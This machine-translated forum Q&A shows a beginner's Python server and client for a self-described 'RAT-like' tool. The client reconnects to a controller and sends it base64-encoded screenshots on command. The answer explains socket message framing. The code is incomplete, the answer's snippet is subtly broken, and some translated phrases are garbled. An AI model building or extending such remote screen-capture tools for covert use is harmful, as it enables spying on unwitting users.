Программа сокетов TCP выполняет одну и ту же функцию несколько раз - PullRequest
0 голосов
/ 04 ноября 2018

Мой случайный "Журчащий": Итак, прежде чем я начну, вы должны знать, что я относительно новичок в Python. Извините, если проблема не в том, что я думаю, а в моем плохом программировании. Итак, я делал простую RAT-подобную программу, функции и вещи которой я вложу в другой проект, над которым я работал.

Выпуск:

У меня есть серверная программа:

import sys
import time
import os
import base64
from PIL import ImageGrab
import socket
from subprocess import call
import random
import string

"""==========================================================="""
"""-=-=-=-=-=-=-=-=Making all functions needed=-=-=-=-=-=-=-=-"""
"""==========================================================="""

"""-----------The SEND function----------"""
def send_msg(m):                           #
    clientsocket.send(m.encode("UTF-8"))   #
"""--------------------------------------"""

"""-------------Generates a random word / String-----------------"""
def randomword(length):                                            #
   letters = string.ascii_lowercase                                #
   return ''.join(random.choice(letters) for i in range(length))   #
"""--------------------------------------------------------------"""

"""---------------------------------------"""
def from_client():                          #
    from_c = clientsocket.recv(4096)        #
    from_client = from_c.decode("UTF-8")    #
    return from_client                      #
"""---------------------------------------"""

"""--------------------Recieve the Image----------------------"""
def recv_png():                                                 #
    ss_name = randomword(2) + "frms.png"                        #
    with open(ss_name, 'wb') as file_to_write:                  #
        while True:                                             #
            #data = clientsocket.recv(4096)                     #
            #if not data:                                       #
            #    break                                          #
            decoded_f = base64.b64decode(from_client())         #
            file_to_write.write(decoded_f)                      #
            file_to_write.close()                               #
            break                                               #
"""-----------------------------------------------------------"""

"""==========================================================="""
"""-=-=-=-=-=-=-=-=Establishing a Connection=-=-=-=-=-=-=-=-=-"""
"""==========================================================="""
#Declaring Variables:
serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)   
#ServerSocket Variable
HOST = socket.gethostname()                                        #HOST 
Variable
PORT = 1732                                                        #PORT 
Variable
#Connections:
serversocket.bind((HOST, PORT))
serversocket.listen(1)
print("+=+=+=+=+=+=++=+=+=+=+=+=+Ze' No0B RAT+=+=+=+=+=+=++=+=+=+=+=+=+")
clientsocket, addr = serversocket.accept()
print("Connected to: " + str(addr))
msg = input("What can I do for you?\n")
while True:
    if msg == "screeny":
        send_msg(msg)
        recv_png()
        msg = input("What can I do for you?\n")

ПРИМЕЧАНИЕ: код все еще не завершен, только что опробовал метод screeny

И тогда у меня есть клиентская программа:

import sys
import time
import os
import base64
from PIL import ImageGrab
import socket
from subprocess import call
import random
import string

"""=============================================================="""
"""-=-=-=-=-=-=-=-=-=-Making all functions needed-=-=-=--=-=-=-=-"""
"""=============================================================="""

"""------Clears the Screen-------"""
def clear():                       #
    if os.name=="nt":              #
        try:                       #
            call(["cls"])          #
        except:                    #
            try:                   #
                os.system("cls")   #
            except:                #
                pass               #
    else:                          #
        try:                       #
            call(["clear"])        #
        except:                    #
            try:                   #
                os.system("clear") #
            except:                #
                pass               #
"""------------------------------"""

"""-------------Generates a random word / String-----------------"""
def randomword(length):                                            #
   letters = string.ascii_lowercase                                #
   return ''.join(random.choice(letters) for i in range(length))   #
"""--------------------------------------------------------------"""

"""---------------------------------------------------------------"""
def connect():                                                      #
    while True:                                                     #
        try:                                                        #
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)   #
            s.connect((host, port))                                 #
            return s.makefile('w')                                  #
        except socket.error as e:                                   #
            log("socket error {} reconnecting".format(e))           #
            time.sleep(5)                                           #
"""---------------------------------------------------------------"""

"""-----The SEND function-----"""
def send_msg(m):                #
    s.send(m.encode("UTF-8"))   #
"""---------------------------"""

"""-----------Take a screenshot-----------------"""
def screeny():                                    #
    ss = ImageGrab.grab()                         #
    ss_name = (randomword(4) + "frmc.png")        #
    ss.save(ss_name)                              #
                                                  #
    upload_file(ss_name)                          #
    send_msg("Done.")                             #
"""---------------------------------------------"""

"""---------------------Upload a File---------------------"""
def upload_file(file):                                      #
    with open(file, 'rb') as file_to_send:                  #
        cryptedFile = base64.b64encode(file_to_send.read()) #
        send = s.send(cryptedFile)                          #
        file_to_send.close()                                #
        return send                                         #
"""-------------------------------------------------------"""




"""===================================================================="""
"""-=-=-=-=-=-=-=--=-=-=-=-=Making a connection=-==-=-=--=-=-=-=-=---=-"""
"""===================================================================="""

#Declaring Variables
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)   #The Socket Variable
HOST = socket.gethostname()                             #The HOST Variable
PORT = 1732                                             #The PORT Variable
Connected = False
while Connected == False:                               #While not connected
    try:                                                #Try to:
        s.connect((HOST, PORT))                         #Connect
        Connected = True                                #Change Connect Status
    except:                                             #If failed or Error:
        time.sleep(10)                                  #Wait for 10
if Connected == True:                                   #If Connected:
    print("Successfully Connected.")                    #Tell the Client


"""==================+================================================"""
"""-=-=-==-=-=-=-=-=-=-=Do what the Server says=-=-=-=-=-=-=-==-=-=-=-"""
"""==================================================================="""
#Declaring Variables
serv_recv = s.recv(4096)                        #Recieve from Server
serv_said = serv_recv.decode("UTF-8")           #Decode what Server said
#The " if's ":
while serv_said != "quit":
    if serv_said == "screeny":                      #If server said "screeny"
        screeny()                                   #Then Execute the "Screeny" function

    elif serv_said == "clear":                      #Or if Server said "clear"
        clear()                                     #Then execute the "clear" function

Кроме того, неполный Так вот в чем дело. Когда я запускаю оба кода и отправляю «screeny» с сервера клиенту, клиент возвращает «Done». на сервер и снова спрашивает, что я хочу. Но клиент делает несколько скриншотов и отправляет только один. И тот скриншот, который он посылает, неполон. Как это странно, и я не могу это объяснить. Я очень, очень ценю любую помощь от вас, ребята. Пожалуйста, скажите мне, что я делаю не так. Я все еще учусь.

1 Ответ

0 голосов
/ 04 ноября 2018

На стороне сервера: from_client() читает только 4096 байт из сокета, а recv_png() вызывает from_client() только один раз, так что вы получите только первые 4 КБ в кодировке base64 изображения.

На стороне клиента: цикл while serv_said != "quit" никогда не получает другую команду с сервера. На самом деле, serv_said никогда не меняется в этом цикле ...

Хотя твоя настоящая проблема гораздо глубже. Вы пытаетесь реализовать протокол , и для этого, среди прочего, вам нужны правила относительно того, когда любая сторона закончит разговор, в вашем конкретном случае, когда передача изображения завершена. Возможно, самый простой способ - сделать так, чтобы отправитель заранее объявил размер сообщения:

def send_file(filename):
    with open(filename) as f:
        content = base64.b64encode(f.read())
    content_size = len(content)
    s.send("{:9}".format(content_size))  # send size header
    s.send(content)

def recv_file(filename):
    content_size = int(s.recv(9))  # recv size header
    content = ""
    while len(content) < content_size:
        block = s.recv(4096)
        content += block
    with open(filename, "w") as f:
       f.write(base64.b64decode(content))
       # note: no close - that's done automatically by leaving the "with" block

(Боковой узел: для улучшения читабельности (и считываемости, считываемой ), отбросьте рамки функций ASCII вокруг функций, и следование PEP8 оказалось очень полезным. Моя рекомендация для каждого учащегося Python должен внимательно читать PEP8 и часто размышлять над ним. Он действительно помогает вам понять ваш собственный код. Для моего собственного кода у меня даже есть black для меня PEP8.)

Добро пожаловать на сайт PullRequest, где вы можете задавать вопросы и получать ответы от других членов сообщества.
...